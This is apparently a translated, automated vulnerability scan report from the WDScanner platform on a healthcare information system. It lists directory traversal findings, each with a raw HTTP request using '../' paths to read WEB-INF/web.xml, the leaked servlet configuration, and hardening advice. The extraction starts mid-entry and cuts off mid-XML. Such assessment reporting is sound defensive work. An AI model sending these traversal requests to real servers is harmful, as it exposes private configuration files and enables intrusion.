Web Application Security Assessment Report
TideSec Security Team
12 August 2020

Target: http://10.8.3.187:9001/phis/

1. Assessment Summary

Assessment target:
Website URL: http://10.8.3.187:9001/phis/
Website title: Primary Healthcare Information System (基层医疗卫生信息系统)
IP address: Error

Web security scan results:
High-risk vulnerabilities: 18
Medium-risk vulnerabilities: 6
Low-risk vulnerabilities: 0

Page security check results:
Total URLs: 52
Dynamic URLs: 1
Hidden-link pages:
Sensitive-word pages:
Broken-link pages:
Snapshot pages:

Information disclosure test results:
Open ports: Error
Subdomains: 1
Sensitive information: 0

2. About WDScanner

In recent years, as internet security vulnerabilities have grown ever more serious, high-risk vulnerabilities such as the OpenSSL Heartbleed bug, Java deserialization vulnerabilities, Struts command execution vulnerabilities and the ImageMagick command execution vulnerability have been disclosed frequently. Against this background, in order to build detection capability quickly once a vulnerability is disclosed, and to perform comprehensive and rapid security checks of websites or hosts, the TideSec security team developed WDScanner, a distributed web security monitoring platform. The main functions of the WDScanner platform include: distributed web vulnerability scanning, customer management, scheduled vulnerability scanning, website crawling, hidden-link detection, website fingerprinting, targeted vulnerability detection, proxy collection and deployment, targeted password cracking, and social-engineering database queries.

(End of the preceding directory traversal entry; its heading and the start of its test details are not present in the extracted text.)

Directory traversal pattern found: (tail of the same web.xml content, from the rpcServer servlet onward, shown in full under 4.4)

HTTP request:
GET /phis/resources/phis/css/images/../../../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening recommendations:
- Filter "." (dot) and other potentially malicious characters. This applies when the production code can be modified and is the most recommended method.
- Use a regular expression to check the format of user-supplied parameters and decide whether the input is legitimate. This method gives the most accurate and fine-grained matching, but it is very difficult and takes a great deal of time to configure the rules.
- Configure open_basedir in php.ini. This parameter specifies the only directories the user may access; it is the fallback when the production code cannot be modified.

4.4 Directory Traversal Vulnerability

Vulnerability description: This script may be vulnerable to directory traversal attacks. Directory traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.
Risk level: High
File path: /phis/resources/sencha/ext3/css
Risk parameter:

Test details:
This file was found using the pattern $dirName/../../../WEB-INF/web.xml?.
Original directory: /phis/resources/sencha/ext3/css
Directory traversal pattern found:

    <context-param>
        <param-name>webAppRootKey</param-name>
        <param-value>phis.root</param-value>
    </context-param>
    <context-param>
        <param-name>log4jConfigLocation</param-name>
        <param-value>classpath:phis/spring/log4j.properties</param-value>
    </context-param>
    <context-param>
        <param-name>log4jRefreshInterval</param-name>
        <param-value>6000</param-value>
    </context-param>
    <listener>
        <listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>
    </listener>
    <listener>
        <listener-class>ctd.mvc.controller.util.MVCSessionListener</listener-class>
    </listener>
    <servlet>
        <servlet-name>springServlet</servlet-name>
        <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
        <init-param>
            <param-name>contextConfigLocation</param-name>
            <param-value>classpath:ctd/mvc/controller/spring-mvc.xml classpath:phis/spring/spring.xml</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>
    <servlet-mapping>
        <servlet-name>springServlet</servlet-name>
        <url-pattern>/</url-pattern>
    </servlet-mapping>
    <servlet>
        <servlet-name>rpcServer</servlet-name>
        <servlet-class>com.caucho.hessian.server.HessianServlet</servlet-class>
        <init-param>
            <param-name>home-class</param-name>
            <param-value>ctd.net.rpc.server.HessianServiceDispather</param-value>
        </init-param>
    </servlet>
    <servlet-mapping>
        <servlet-name>rpcServer</servlet-name>
        <url-pattern>/rpc/*</url-pattern>
    </servlet-mapping>
    <!--
    <servlet>
        <servlet-name>AuthorizationServlet</servlet-name>
        <servlet-class>ctd.oauth.AuthorizationCostom</servlet-class>
    </servlet>
    <servlet>
        <servlet-name>AuthLogon</servlet-name>
        <servlet-class>ctd.oauth.AuthLogon</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>AuthorizationServlet</servlet-name>
        <url-pattern>/oauth/authorize</url-pattern>
    </servlet-mapping>
    <servlet-mapping>
        <servlet-name>AuthLogon</servlet-name>
        <url-pattern>/oauth/authorize_logon</url-pattern>
    </servlet-mapping>
    -->
    <servlet>
        <servlet-name>HttpForward</servlet-name>
        <servlet-class>phis.source.controller.HttpControllerForward</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>HttpForward</servlet-name>
        <url-pattern>/forward/*</url-pattern>
    </servlet-mapping>

HTTP request:
GET /phis/resources/sencha/ext3/css/../../../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening recommendations: same as above.

4.5 Directory Traversal Vulnerability

Vulnerability description: This script may be vulnerable to directory traversal attacks. Directory traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.
Risk level: High
File path: /phis/resources/app
Risk parameter:

Test details:
This file was found using the pattern $dirName/../WEB-INF/web.xml?.
Original directory: /phis/resources/app
Directory traversal pattern found: (same web.xml content as shown under 4.4)

HTTP request:
GET /phis/resources/app/../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening recommendations: same as above.

4.6 Directory Traversal Vulnerability

Vulnerability description: This script may be vulnerable to directory traversal attacks. Directory traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.
Risk level: High
File path: /phis/resources/element
Risk parameter:

Test details:
This file was found using the pattern $dirName/../WEB-INF/web.xml?.
Original directory: /phis/resources/element
Directory traversal pattern found: (same web.xml content as shown under 4.4)

HTTP request:
GET /phis/resources/element/../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening recommendations: same as above.

4.7 Directory Traversal Vulnerability

Vulnerability description: This script may be vulnerable to directory traversal attacks. Directory traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.
Risk level: High
File path: /phis/resources/phis
Risk parameter:

Test details:
This file was found using the pattern $dirName/../WEB-INF/web.xml?.
Original directory: /phis/resources/phis
Directory traversal pattern found: (same web.xml content as shown under 4.4)

HTTP request:
GET /phis/resources/phis/../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening recommendations: same as above.

4.8 Directory Traversal Vulnerability

Vulnerability description: This script may be vulnerable to directory traversal attacks. Directory traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.
Risk level: High
File path: /phis/resources/app/desktop
Risk parameter:

Test details:
This file was found using the pattern $dirName/../../WEB-INF/web.xml?.
Original directory: /phis/resources/app/desktop
Directory traversal pattern found: (same web.xml content as shown under 4.4)

HTTP request:
GET /phis/resources/app/desktop/../../WEB-INF/web.xml? HTTP/1.1
Host: 10.8.3.187:9001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Hardening recommendations: same as above.

4.9 Directory Traversal Vulnerability

Vulnerability description: This script may be vulnerable to directory traversal attacks. Directory traversal is a vulnerability that allows an attacker to access restricted directories and execute commands outside the web server's root directory.
Risk level: High
File path: /phis/resources
Risk parameter:

Test details:
This file was found using the pattern $dirName/../WEB-INF/web.xml?.
Original directory: /phis/resources
Directory traversal pattern found:

    <web-app xmlns="http://java.sun.com/xml/ns/javaee"
             xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
             xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/we